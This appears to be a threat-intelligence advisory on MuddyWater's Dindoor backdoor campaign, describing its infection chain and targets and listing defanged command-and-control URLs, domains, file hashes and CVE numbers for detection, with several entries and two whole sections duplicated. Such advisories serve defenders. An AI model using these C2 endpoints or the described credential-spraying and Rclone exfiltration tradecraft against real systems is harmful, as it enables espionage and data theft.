Summary:
Recent intelligence indicates an escalation in Iranian state-sponsored cyber operations linked to the MuddyWater advanced persistent threat (APT) group, which is associated with Iran’s Ministry of Intelligence and Security (MOIS). The campaign has primarily targeted organizations in sectors such as banking, aviation, nonprofit institutions, and defense supply chains across the United States and allied nations.
Attackers have deployed a newly identified backdoor known as Dindoor, which leverages the Deno JavaScript runtime to establish persistent access within compromised environments. The malware enables remote command execution and may facilitate data exfiltration through cloud-based infrastructure. The activity reflects Iran’s increasing reliance on credential compromise, cloud abuse, and targeted intrusion campaigns during periods of geopolitical tension, highlighting the need for stronger identity protection, network monitoring, and defensive security controls.
Technical Description:
The intrusion activity attributed to the Iranian-affiliated MuddyWater group involves the deployment of a newly identified backdoor called Dindoor. This malware leverages the Deno JavaScript runtime to execute malicious scripts and maintain persistent access within compromised networks.
Following initial access through spear-phishing, credential compromise, or exploitation of vulnerable services, attackers establish persistence and introduce additional tools to support post-exploitation activities. Observed tooling includes the Python-based Fakeset backdoor and the file synchronization utility Rclone, which is used to stage and potentially exfiltrate data to external cloud storage platforms.
The malware payloads are delivered from trusted cloud infrastructure and digitally signed using certificates previously associated with MuddyWater-linked malware families such as Stagecomp and Darkcomp. This approach allows attackers to blend malicious activity with legitimate cloud traffic while conducting reconnaissance, lateral movement, and data collection inside targeted environments. The details and technicalities of the attack campaign are discussed further,
Delivery and Infection Chain:
Initial access in the campaign is most likely achieved through spear-phishing campaigns, credential harvesting, or the exploitation of vulnerable internet-facing services. MuddyWater operators frequently rely on compromised credentials, social engineering, and password spraying rather than zero-day vulnerabilities to enter targeted environments.
In this campaign, malware payloads, including the Fakeset Python backdoor, were downloaded from legitimate cloud infrastructure, enabling attackers to bypass traditional security controls and disguise malicious activity within legitimate network traffic. The Infection chain was identified as follows,
- The attack typically begins with initial access through spear-phishing, credential harvesting, or password spraying targeting user accounts or externally exposed services within the victim organization.
- After gaining access, attackers establish a foothold in the environment and conduct reconnaissance to identify valuable systems, user privileges, and network architecture while preparing for further payload deployment.
- The operators then deploy the Dindoor backdoor, which uses the Deno JavaScript runtime to execute malicious scripts and maintain persistent communication with attacker-controlled command-and-control infrastructure.
- Additional malware such as the Fakeset Python backdoor may be deployed to maintain redundant access and facilitate lateral movement across compromised systems.
- Finally, attackers leverage tools such as Rclone to stage and potentially exfiltrate sensitive data to attacker-controlled cloud storage services, enabling long-term espionage and data theft.
Technical Capabilities:
The primary capability observed in this campaign is the deployment of the Dindoor backdoor, which uses the Deno JavaScript runtime to execute malicious scripts on compromised systems. By leveraging a lightweight runtime environment commonly associated with legitimate development operations, the malware can blend into normal system processes and evade detection.
The backdoor establishes persistent communication with attacker-controlled command-and-control infrastructure, enabling attackers to issue commands, execute scripts, gather system information, and maintain long-term access within targeted environments.
In addition to Dindoor, attackers deploy auxiliary tools to expand operational capabilities and maintain redundancy within compromised networks. The Fakeset Python-based backdoor provides an alternative access mechanism, ensuring continued control even if one access channel is disrupted.
Attackers also utilize legitimate tools such as Rclone to stage and exfiltrate sensitive data to external cloud storage providers. By embedding malicious operations within legitimate network activity, the attackers reduce the likelihood of detection while enabling stealthy reconnaissance, lateral movement, and data exfiltration. These capabilities demonstrate a threat actor focused on long-term espionage and covert intelligence collection.
Attribution and Evolution:
The activity has been attributed to MuddyWater, also known as Seedworm, an Iranian state-sponsored threat group linked to the Ministry of Intelligence and Security. Historically, MuddyWater has targeted financial institutions, telecommunications providers, government organizations, and critical infrastructure sectors across multiple regions.
Over time, the group has evolved from relying on simple scripting techniques and commodity malware toward developing more sophisticated tooling, including custom backdoors and improved operational security measures designed to evade attribution and detection.
Active Campaign and Geographic Spread:
Recent activity associated with this campaign has targeted organizations in North America, including the United States and Canada, across sectors such as banking, aviation, nonprofit organizations, and defense-related software providers.
The campaign has also emerged within the broader context of rising geopolitical tensions involving Iran, Israel, and Western allies. Simultaneously, scanning and exploitation attempts have been reported against internet-connected edge devices and surveillance infrastructure across the Middle East and Gulf region, including the United Arab Emirates, Qatar, Bahrain, and Kuwait.
Conclusion:
The discovery of the Dindoor backdoor highlights the continued expansion of Iranian cyber capabilities and the strategic role of cyber operations in geopolitical conflicts. MuddyWater’s use of legitimate cloud infrastructure, credential-based access techniques, and lightweight malware frameworks demonstrates a deliberate emphasis on stealth, persistence, and operational flexibility.
Organizations should strengthen monitoring of cloud activity, implement robust identity security controls, and restrict exposure of internet-facing systems in order to mitigate the risks posed by similar intrusion campaigns.
Impact:
The discovery of the Dindoor backdoor highlights the continued expansion of Iranian cyber capabilities and the strategic role of cyber operations in geopolitical conflicts. MuddyWater’s use of legitimate cloud infrastructure, credential-based access techniques, and lightweight malware frameworks demonstrates a deliberate emphasis on stealth, persistence, and operational flexibility.
Organizations should strengthen monitoring of cloud activity, implement robust identity security controls, and restrict exposure of internet-facing systems in order to mitigate the risks posed by similar intrusion campaigns.
IOC and Context Details:
| Topics |
Details |
| Tactic Name |
Initial Access, Persistence, Command and Control, Credential Access, Exfiltration |
| Technique Name |
Spear-phishing
Password Spraying
Valid Accounts
Command and Scripting Interpreter
Exfiltration Over Web Services
|
| Sub Technique Name |
Phishing via Email
Credential Harvesting
JavaScript Execution via Deno Runtime
Python Backdoor Deployment
Cloud Storage Data Exfiltration
|
| Attack Type |
Malware |
| Targeted Applications |
Cloud storage platforms, enterprise identity systems, internet-facing services, surveillance camera systems (Hikvision, Dahua)
|
| Region Impacted |
United States, Canada, Israel, UAE, Qatar, Bahrain, Kuwait, Lebanon, Cyprus
|
| Industry Impacted |
Banking and financial services, aviation/airports, non-profit organizations, defense and aerospace suppliers
|
| IOC’s |
Domains:
106[.]187[.]38[.]21
arbiogaz[.]com
azmwn[.]suliparwarda[.]com
bangortalk[.]org[.]uk
best2[.]thebestconference[.]org
camco[.]com[.]pk
cbpexbrasilia[.]com[.]br
cgss[.]com[.]pk
diplomat[.]com[.]sa
feribschat[.]eu
ghanaconsulate[.]com[.]pk
magical-energy[.]com
mainandstrand[.]com
riyadhfoods[.]com
school[.]suliparwarda[.]com
suliparwarda[.]com
tmclub[.]eu
watyanagr[.]nfe[.]go[.]th
whiver[.]in
www[.]4seasonrentacar[.]com
www[.]akhtaredanesh[.]com
www[.]arcadecreative[.]com
www[.]armaholic[.]com
www[.]asan-max[.]com
www[.]autotrans[.]hr
www[.]dafc[.]co[.]uk
www[.]eapa[.]org
www[.]elev8tor[.]com
www[.]jdarchs[.]com
www[.]kunkrooann[.]com
www[.]mackellarscreenworks[.]com
www[.]mitegen[.]com
www[.]nigelwhitfield[.]com
www[.]pomegranates[.]org
www[.]ridefox[.]com
www[.]shapingtomorrowsworld[.]org
www[.]vanessajackson[.]co[.]uk
www[.]yaran[.]co
www[.]ztm[.]waw[.]pl
coa[.]inducks[.]org
mhtevents[.]com
skepticalscience[.]com
wallpapercase[.]com
www[.]spearhead-training[.]com
SHA-256 Hash:
d2a0eec18d755d456a34865ff2ffc14e3969ea77f7235ef5dfc3928972d7960f
1421a5cd0566f4a69e7ca9cdefa380507144d7ed59cd22e53bfd25263c201a6f
4e3c7defd6f3061b0303e687a4b5b3cc2a4ae84cdc48706c65a7b1e53402efc0
8b96804d861ea690fcb61224ec27b84476cf3117222cca05e6eba955d9395deb
16985600c959f6267476da614243a585b1b222213ec938351ef6a26560c992db
cf87a2ac51503d645e827913dd69f3d80b66a58195e5a0044af23ea6ba46b823
3030d80cfe1ee6986657a2d9b76b626ea05e2c289dee05bd7b9553b10d14e4a1
99077dcb37395603db0f99823a190f50313dc4e9819462c7da29c4bc983f42fd
1b60b7f9b0faf25288f1057b154413921a6cb373dcee43e831b9263c5b3077ce
2c8d18f03b6624fa38cae0141b91932ba9dc1221ec5cf7f841a2f7e31685e6a1
367021beedb3ad415c69c9a0e657dc3ed82b1b24a41a71537d889f5e2b7ca433
58282917a024ac252966650361ac4cbbbed48a0df7cab7b9a6329d4a04551c0d
58898648a68f0639c06bedc8242ca48bc6ec56f11ed40d00aa5fdda4e5553482
81523e0199ae1dc9e87d2b952642785bfbda6326f22e4c0794a19afdf001a9a3
90b66b3fef77962fbfda364a4f8799bfcc9ab73772026d7a8922a7cf5556a024
96101de2386e35bc5e38d32524a02c6c5ca7cc6624e656a629b2e0f1693a76fd
964aaf5d9b1c749df0a2df1f1b4193e5a643893f251e2d74b47663f895da9b13
97f9a83bc6bb1b3f5cb7ac9401f95265597bff796bb4901631d6fa2c79a48bdc
a3c1fd46177a078c4b95c744a24103df7d0a58cee1a3be92bc4cdd7dec1b1aa5
fcfbdffbcad731e0a5aad349215c87ed919865d66c287a6723fd8e2f896c5834
URLs:
hxxp://106[.]187[.]38[.]21/short_qr/work[.]php?c=
hxxp://arbiogaz[.]com/upload/work[.]php?c=
hxxp://azmwn[.]suliparwarda[.]com/wp-content/plugins/wpdatatables/panda[.]php?c=
hxxp://azmwn[.]suliparwarda[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
hxxp://bangortalk[.]org[.]uk/speakers[.]php?c=
hxxp://best2[.]thebestconference[.]org/ccb/browse_cat[.]php?c=
hxxp://camco[.]com[.]pk/Controls/data[.]aspx?c=
hxxp://cbpexbrasilia[.]com[.]br/wp-content/plugins/wordpress-seo/power[.]php?c=
hxxp://cbpexbrasilia[.]com[.]br/wp-includes/widgets/work[.]php?c=
hxxp://cgss[.]com[.]pk/data[.]aspx?c=
hxxp://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c=
hxxp://feribschat[.]eu/logs[.]php?c=
hxxp://ghanaconsulate[.]com[.]pk/data[.]aspx?c=
hxxp://magical-energy[.]com/css[.]aspx?c=
hxxp://magical-energy[.]com/css/css[.]aspx?c=
hxxp://mainandstrand[.]com/work[.]php?c=
hxxp://riyadhfoods[.]com/css/edu[.]aspx?c=
hxxp://riyadhfoods[.]com/jquery-ui/js/jquery[.]aspx?c=
hxxp://school[.]suliparwarda[.]com/components/com_akeeba/work[.]php?c=
hxxp://school[.]suliparwarda[.]com/plugins/editors/codemirror/work[.]php?c=
hxxp://suliparwarda[.]com/includes/panda[.]php?c=
hxxp://suliparwarda[.]com/layouts/joomla/logs[.]php?c=
hxxp://suliparwarda[.]com/wp-content/plugins/entry-views/work[.]php?c=
hxxp://suliparwarda[.]com/wp-content/themes/twentyfifteen/work[.]php?c=
hxxp://tmclub[.]eu/clubdata[.]php?c=
hxxp://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c=
hxxp://watyanagr[.]nfe[.]go[.]th/watyanagr/power[.]php?c=
hxxp://whiver[.]in/power[.]php?c=
hxxp://www[.]4seasonrentacar[.]com/viewsure/data[.]aspx?c=
hxxp://www[.]akhtaredanesh[.]com/d/file/sym/work[.]php?c=
hxxp://www[.]akhtaredanesh[.]com/d/oschool/power[.]php?c=
hxxp://www[.]arcadecreative[.]com/work[.]php?c=
hxxp://www[.]armaholic[.]com/list[.]php?c=
hxxp://www[.]asan-max[.]com/files/articles/css[.]aspx?c=
hxxp://www[.]asan-max[.]com/files/articles/large/css[.]aspx?c=
hxxp://www[.]autotrans[.]hr/index[.]php?c=
hxxp://www[.]dafc[.]co[.]uk/news[.]php?c=
hxxp://www[.]eapa[.]org/asphalt[.]php?c=
hxxp://www[.]elev8tor[.]com/show-work[.]php?c=
hxxp://www[.]jdarchs[.]com/work[.]php?c=
hxxp://www[.]kunkrooann[.]com/inc/work[.]php?c=
hxxp://www[.]mackellarscreenworks[.]com/work[.]php?c=
hxxp://www[.]mitegen[.]com/mic_catalog[.]php?c=
hxxp://www[.]nigelwhitfield[.]com/v2/work[.]php?c=
hxxp://www[.]pomegranates[.]org/index[.]php?c=
hxxp://www[.]ridefox[.]com/content[.]php?c=
hxxp://www[.]shapingtomorrowsworld[.]org/category[.]php?c=
hxxp://www[.]vanessajackson[.]co[.]uk/work[.]php?c=
hxxp://www[.]yaran[.]co//wp-content/plugins/so-masonry/logs[.]php?c=
hxxp://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c=
hxxp://www[.]ztm[.]waw[.]pl/pop[.]php?c=
hxxps://coa[.]inducks[.]org/publication[.]php?c=
hxxps://mhtevents[.]com/account[.]php?c=
hxxps://skepticalscience[.]com/graphics[.]php?c=
hxxps://wallpapercase[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
hxxps://wallpapercase[.]com/wp-includes/customize/logs[.]php?c=
hxxps://www[.]spearhead-training[.]com//html/power[.]php?c=
hxxps://www[.]spearhead-training[.]com/work[.]php?c=
hxxp://azmwn[.]suliparwarda[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
hxxp://bangortalk[.]org[.]uk/speakers[.]php?c=
hxxp://best2[.]thebestconference[.]org/ccb/browse_cat[.]php?c=
hxxp://camco[.]com[.]pk/Controls/data[.]aspx?c=
hxxp://cbpexbrasilia[.]com[.]br/wp-content/plugins/wordpress-seo/power[.]php?c=
hxxp://cbpexbrasilia[.]com[.]br/wp-includes/widgets/work[.]php?c=
hxxp://cgss[.]com[.]pk/data[.]aspx?c=
hxxp://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c=
|
| CVE |
CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2021-33044, CVE-2025-34067
|
Recommended Actions:
- Implement phishing-resistant multi-factor authentication across all user accounts, particularly for privileged accounts and remote access services, to reduce the risk of credential compromise and password spraying attacks.
- Conduct regular patch management and vulnerability remediation for internet-facing systems, including VPN gateways, edge devices, and surveillance infrastructure.
- Restrict and monitor the use of administrative privileges and remote access tools while enforcing the principle of least privilege.
- Enhance network monitoring and logging to detect unusual outbound connections, suspicious command execution activity, and communication with external cloud storage services.
- Implement network segmentation to restrict lateral movement and isolate critical systems such as financial platforms, operational technology, and sensitive databases.
- Monitor for abnormal usage of legitimate tools such as Rclone or scripting environments that may be abused for data staging or data exfiltration.
- Strengthen email security controls and user awareness programs to reduce the likelihood of successful spear-phishing or social engineering attacks.
- Maintain secure offline backups of critical data and ensure tested incident response procedures are in place to enable rapid containment and recovery in the event of compromise.
Reference:
https://www.infosecurity-magazine.com/news/iran-muddywater-hackers-us-firms/
https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/
